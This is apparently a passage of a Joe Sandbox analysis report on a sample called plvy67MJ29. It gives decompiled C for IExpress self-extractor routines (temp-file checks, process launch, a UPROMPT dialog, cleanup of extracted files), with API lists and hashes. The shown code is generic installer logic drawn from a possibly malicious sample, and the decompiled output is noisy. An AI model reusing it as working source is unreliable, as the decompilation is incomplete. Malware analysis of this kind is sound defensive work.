                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				signed char _t16;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                                                                    				CHAR* _t33;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                    				_t27 = __ecx;
                                                                                                                                                                                                    				_t23 = __ecx + 1;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t6 =  *_t27;
                                                                                                                                                                                                    					_t27 = _t27 + 1;
                                                                                                                                                                                                    				} while (_t6 != 0);
                                                                                                                                                                                                    				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                    				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                    				if(_t20 != 0) {
                                                                                                                                                                                                    					E00FD1680(_t20, _t36, _t33);
                                                                                                                                                                                                    					E00FD658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                    					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                    					_v8 = _t10;
                                                                                                                                                                                                    					LocalFree(_t20);
                                                                                                                                                                                                    					_t12 = _v8;
                                                                                                                                                                                                    					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                    						goto L4;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						CloseHandle(_t12);
                                                                                                                                                                                                    						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                    						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *0xfd9124 = 0;
                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E00FD44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    					_t14 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x00fd58cd
                                                                                                                                                                                                    0x00fd58d1
                                                                                                                                                                                                    0x00fd58d3
                                                                                                                                                                                                    0x00fd58d5
                                                                                                                                                                                                    0x00fd58d8
                                                                                                                                                                                                    0x00fd58d8
                                                                                                                                                                                                    0x00fd58da
                                                                                                                                                                                                    0x00fd58db
                                                                                                                                                                                                    0x00fd58e1
                                                                                                                                                                                                    0x00fd58ed
                                                                                                                                                                                                    0x00fd58f1
                                                                                                                                                                                                    0x00fd591e
                                                                                                                                                                                                    0x00fd592c
                                                                                                                                                                                                    0x00fd5943
                                                                                                                                                                                                    0x00fd594a
                                                                                                                                                                                                    0x00fd594d
                                                                                                                                                                                                    0x00fd5953
                                                                                                                                                                                                    0x00fd5959
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd595b
                                                                                                                                                                                                    0x00fd595c
                                                                                                                                                                                                    0x00fd5963
                                                                                                                                                                                                    0x00fd596c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5972
                                                                                                                                                                                                    0x00fd5974
                                                                                                                                                                                                    0x00fd597a
                                                                                                                                                                                                    0x00fd597a
                                                                                                                                                                                                    0x00fd596c
                                                                                                                                                                                                    0x00fd58f3
                                                                                                                                                                                                    0x00fd5901
                                                                                                                                                                                                    0x00fd5906
                                                                                                                                                                                                    0x00fd590b
                                                                                                                                                                                                    0x00fd5910
                                                                                                                                                                                                    0x00fd5910
                                                                                                                                                                                                    0x00fd5918

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00FD5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD58E7
                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00FD5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5943
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00FD5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD594D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00FD5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD595C
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00FD5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5963
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
                                                                                                                                                                                                    • API String ID: 747627703-3705647674
                                                                                                                                                                                                    • Opcode ID: da08800595831284bb4d855cd4705d4e7166be2ac7f40946305bd36db8b7cf0b
                                                                                                                                                                                                    • Instruction ID: 54244aac8907189a7d764ffb2339b7878106f09188bf5e6fd596ba0843f4a7b9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: da08800595831284bb4d855cd4705d4e7166be2ac7f40946305bd36db8b7cf0b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5112232A012246BC7205FB9AC0EB9B7F9BEF46770B180617B50AD33D1CA74D805B6A5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 631 fd3fef-fd4010 632 fd410a-fd411a call fd6ce0 631->632 633 fd4016-fd403b CreateProcessA 631->633 634 fd40c4-fd4101 call fd6285 GetLastError FormatMessageA call fd44b9 633->634 635 fd4041-fd406e WaitForSingleObject GetExitCodeProcess 633->635 647 fd4106 634->647 638 fd4091 call fd411b 635->638 639 fd4070-fd4077 635->639 646 fd4096-fd40b8 CloseHandle * 2 638->646 639->638 642 fd4079-fd407b 639->642 642->638 645 fd407d-fd4089 642->645 645->638 648 fd408b 645->648 649 fd4108 646->649 650 fd40ba-fd40c0 646->650 647->649 648->638 649->632 650->649 651 fd40c2 650->651 651->647
                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                    			E00FD3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v524;
                                                                                                                                                                                                    				long _v528;
                                                                                                                                                                                                    				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t20;
                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                    				int _t25;
                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t45 = __edx;
                                                                                                                                                                                                    				_t20 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                    				_t39 = __ecx;
                                                                                                                                                                                                    				_t49 = 1;
                                                                                                                                                                                                    				_t22 = 0;
                                                                                                                                                                                                    				if(__ecx == 0) {
                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                    					return E00FD6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                    				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                    				if(_t25 == 0) {
                                                                                                                                                                                                    					 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                    					_t45 = 0x4c4;
                                                                                                                                                                                                    					E00FD44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					_t49 = 0;
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t22 = _t49;
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                    				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                    				_t44 = _v528;
                                                                                                                                                                                                    				_t53 =  *0xfd8a28; // 0x0
                                                                                                                                                                                                    				if(_t53 == 0) {
                                                                                                                                                                                                    					_t34 =  *0xfd9a2c; // 0x0
                                                                                                                                                                                                    					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                    						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                    						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                    							 *0xfd9a2c = _t44;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E00FD411B(_t34, _t44);
                                                                                                                                                                                                    				CloseHandle(_v544.hThread);
                                                                                                                                                                                                    				CloseHandle(_v544);
                                                                                                                                                                                                    				if(( *0xfd9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00fd3fef
                                                                                                                                                                                                    0x00fd3ffa
                                                                                                                                                                                                    0x00fd4001
                                                                                                                                                                                                    0x00fd4008
                                                                                                                                                                                                    0x00fd400a
                                                                                                                                                                                                    0x00fd400b
                                                                                                                                                                                                    0x00fd4010
                                                                                                                                                                                                    0x00fd410a
                                                                                                                                                                                                    0x00fd411a
                                                                                                                                                                                                    0x00fd411a
                                                                                                                                                                                                    0x00fd401c
                                                                                                                                                                                                    0x00fd401d
                                                                                                                                                                                                    0x00fd401e
                                                                                                                                                                                                    0x00fd401f
                                                                                                                                                                                                    0x00fd4033
                                                                                                                                                                                                    0x00fd403b
                                                                                                                                                                                                    0x00fd40ca
                                                                                                                                                                                                    0x00fd40e9
                                                                                                                                                                                                    0x00fd40f8
                                                                                                                                                                                                    0x00fd4101
                                                                                                                                                                                                    0x00fd4106
                                                                                                                                                                                                    0x00fd4106
                                                                                                                                                                                                    0x00fd4108
                                                                                                                                                                                                    0x00fd4108
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4108
                                                                                                                                                                                                    0x00fd4049
                                                                                                                                                                                                    0x00fd405c
                                                                                                                                                                                                    0x00fd4062
                                                                                                                                                                                                    0x00fd4068
                                                                                                                                                                                                    0x00fd406e
                                                                                                                                                                                                    0x00fd4070
                                                                                                                                                                                                    0x00fd4077
                                                                                                                                                                                                    0x00fd407f
                                                                                                                                                                                                    0x00fd4089
                                                                                                                                                                                                    0x00fd408b
                                                                                                                                                                                                    0x00fd408b
                                                                                                                                                                                                    0x00fd4089
                                                                                                                                                                                                    0x00fd4077
                                                                                                                                                                                                    0x00fd4091
                                                                                                                                                                                                    0x00fd409c
                                                                                                                                                                                                    0x00fd40a8
                                                                                                                                                                                                    0x00fd40b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd40c2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd40c2

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00FD4033
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FD4049
                                                                                                                                                                                                    • GetExitCodeProcess.KERNELBASE ref: 00FD405C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FD409C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FD40A8
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00FD40DC
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00FD40E9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3183975587-0
                                                                                                                                                                                                    • Opcode ID: e5eb5c9b5cf8bc5464dae708817661577b9c1668ecb05398dd01b7d79e083b92
                                                                                                                                                                                                    • Instruction ID: a09852959100f09448965daa18f96b63ccbfda2fbdf9d1e8946439989f01aced
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5eb5c9b5cf8bc5464dae708817661577b9c1668ecb05398dd01b7d79e083b92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D31B132A4221CABEB209B75DC4DFAB777AEB94710F1401ABF505D2261C6345C85EF15
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 652 fd51e5-fd520b call fd468f LocalAlloc 655 fd522d-fd523c call fd468f 652->655 656 fd520d-fd5228 call fd44b9 call fd6285 652->656 662 fd523e-fd5260 call fd44b9 LocalFree 655->662 663 fd5262-fd5270 lstrcmpA 655->663 671 fd52b0 656->671 662->671 665 fd527e-fd529c call fd44b9 LocalFree 663->665 666 fd5272-fd5273 LocalFree 663->666 674 fd529e-fd52a4 665->674 675 fd52a6 665->675 669 fd5279-fd527c 666->669 672 fd52b2-fd52b5 669->672 671->672 674->669 675->671
                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00FD51E5(void* __eflags) {
                                                                                                                                                                                                    				int _t5;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t1 = E00FD468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                    				if(_t28 != 0) {
                                                                                                                                                                                                    					if(E00FD468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                    						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                    						if(_t5 != 0) {
                                                                                                                                                                                                    							_t6 = E00FD44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                    							LocalFree(_t28);
                                                                                                                                                                                                    							if(_t6 != 6) {
                                                                                                                                                                                                    								 *0xfd9124 = 0x800704c7;
                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *0xfd9124 = 0;
                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                    							return 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						LocalFree(_t28);
                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E00FD44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					LocalFree(_t28);
                                                                                                                                                                                                    					 *0xfd9124 = 0x80070714;
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E00FD44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    				 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    				goto L10;
                                                                                                                                                                                                    			}






                                                                                                                                                                                                    0x00fd51fb
                                                                                                                                                                                                    0x00fd5207
                                                                                                                                                                                                    0x00fd520b
                                                                                                                                                                                                    0x00fd523c
                                                                                                                                                                                                    0x00fd5268
                                                                                                                                                                                                    0x00fd5270
                                                                                                                                                                                                    0x00fd528b
                                                                                                                                                                                                    0x00fd5293
                                                                                                                                                                                                    0x00fd529c
                                                                                                                                                                                                    0x00fd52a6
                                                                                                                                                                                                    0x00fd52b0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd52b0
                                                                                                                                                                                                    0x00fd529e
                                                                                                                                                                                                    0x00fd5279
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd527b
                                                                                                                                                                                                    0x00fd5273
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5273
                                                                                                                                                                                                    0x00fd524a
                                                                                                                                                                                                    0x00fd5250
                                                                                                                                                                                                    0x00fd5256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5256
                                                                                                                                                                                                    0x00fd5219
                                                                                                                                                                                                    0x00fd5223
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
                                                                                                                                                                                                      • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00FD2F4D,?,00000002,00000000), ref: 00FD5201
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00FD5250
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                      • Part of subcall function 00FD6285: GetLastError.KERNEL32(00FD5BBC), ref: 00FD6285
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                    • Opcode ID: 471245a2e79b1d45a80fd8c4a92d71e416b9fe7a721d42d3ea5d01a581d5cb16
                                                                                                                                                                                                    • Instruction ID: 6c7d27908d18bde8da87365df6245645404a5717a873dca5d77b925bb99c45c2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 471245a2e79b1d45a80fd8c4a92d71e416b9fe7a721d42d3ea5d01a581d5cb16
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E71108726022057BD3146BB15C4AF3B729FEB8A751B18402BFA02D6390DABD9C007128
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                    			E00FD52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				CHAR** _t31;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t28 = __edi;
                                                                                                                                                                                                    				_t22 = __ecx;
                                                                                                                                                                                                    				_t21 = __ebx;
                                                                                                                                                                                                    				_t9 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                    				_t31 =  *0xfd91e0; // 0x33d8f70
                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t29 = _t31;
                                                                                                                                                                                                    						if( *0xfd8a24 == 0 &&  *0xfd9a30 == 0) {
                                                                                                                                                                                                    							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                    							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t31 = _t31[1];
                                                                                                                                                                                                    						LocalFree( *_t29);
                                                                                                                                                                                                    						LocalFree(_t29);
                                                                                                                                                                                                    					} while (_t31 != 0);
                                                                                                                                                                                                    					_pop(_t28);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 =  *0xfd8a20; // 0x0
                                                                                                                                                                                                    				_pop(_t32);
                                                                                                                                                                                                    				if(_t11 != 0 &&  *0xfd8a24 == 0 &&  *0xfd9a30 == 0) {
                                                                                                                                                                                                    					_push(_t22);
                                                                                                                                                                                                    					E00FD1781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                    					if(( *0xfd9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                    						E00FD65E8( &_v268);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                    					_t22 =  &_v268;
                                                                                                                                                                                                    					E00FD2390( &_v268);
                                                                                                                                                                                                    					_t11 =  *0xfd8a20; // 0x0
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if( *0xfd9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                    					_t11 = E00FD1FE1(_t22); // executed
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *0xfd8a20 =  *0xfd8a20 & 0x00000000;
                                                                                                                                                                                                    				return E00FD6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x00fd52b6
                                                                                                                                                                                                    0x00fd52b6
                                                                                                                                                                                                    0x00fd52b6
                                                                                                                                                                                                    0x00fd52c1
                                                                                                                                                                                                    0x00fd52c8
                                                                                                                                                                                                    0x00fd52cb
                                                                                                                                                                                                    0x00fd52cc
                                                                                                                                                                                                    0x00fd52d4
                                                                                                                                                                                                    0x00fd52d6
                                                                                                                                                                                                    0x00fd52d7
                                                                                                                                                                                                    0x00fd52de
                                                                                                                                                                                                    0x00fd52e0
                                                                                                                                                                                                    0x00fd52f2
                                                                                                                                                                                                    0x00fd52fa
                                                                                                                                                                                                    0x00fd52fa
                                                                                                                                                                                                    0x00fd5302
                                                                                                                                                                                                    0x00fd5305
                                                                                                                                                                                                    0x00fd530c
                                                                                                                                                                                                    0x00fd5312
                                                                                                                                                                                                    0x00fd5316
                                                                                                                                                                                                    0x00fd5316
                                                                                                                                                                                                    0x00fd5317
                                                                                                                                                                                                    0x00fd531c
                                                                                                                                                                                                    0x00fd531f
                                                                                                                                                                                                    0x00fd5333
                                                                                                                                                                                                    0x00fd5345
                                                                                                                                                                                                    0x00fd5351
                                                                                                                                                                                                    0x00fd5359
                                                                                                                                                                                                    0x00fd5359
                                                                                                                                                                                                    0x00fd5363
                                                                                                                                                                                                    0x00fd5369
                                                                                                                                                                                                    0x00fd536f
                                                                                                                                                                                                    0x00fd5374
                                                                                                                                                                                                    0x00fd5374
                                                                                                                                                                                                    0x00fd5381
                                                                                                                                                                                                    0x00fd5387
                                                                                                                                                                                                    0x00fd5387
                                                                                                                                                                                                    0x00fd538f
                                                                                                                                                                                                    0x00fd53a0

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(033D8F70,00000080,?,00000000), ref: 00FD52F2
                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(033D8F70), ref: 00FD52FA
                                                                                                                                                                                                    • LocalFree.KERNEL32(033D8F70,?,00000000), ref: 00FD5305
                                                                                                                                                                                                    • LocalFree.KERNEL32(033D8F70), ref: 00FD530C
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(00FD11FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD5363
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00FD5334
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
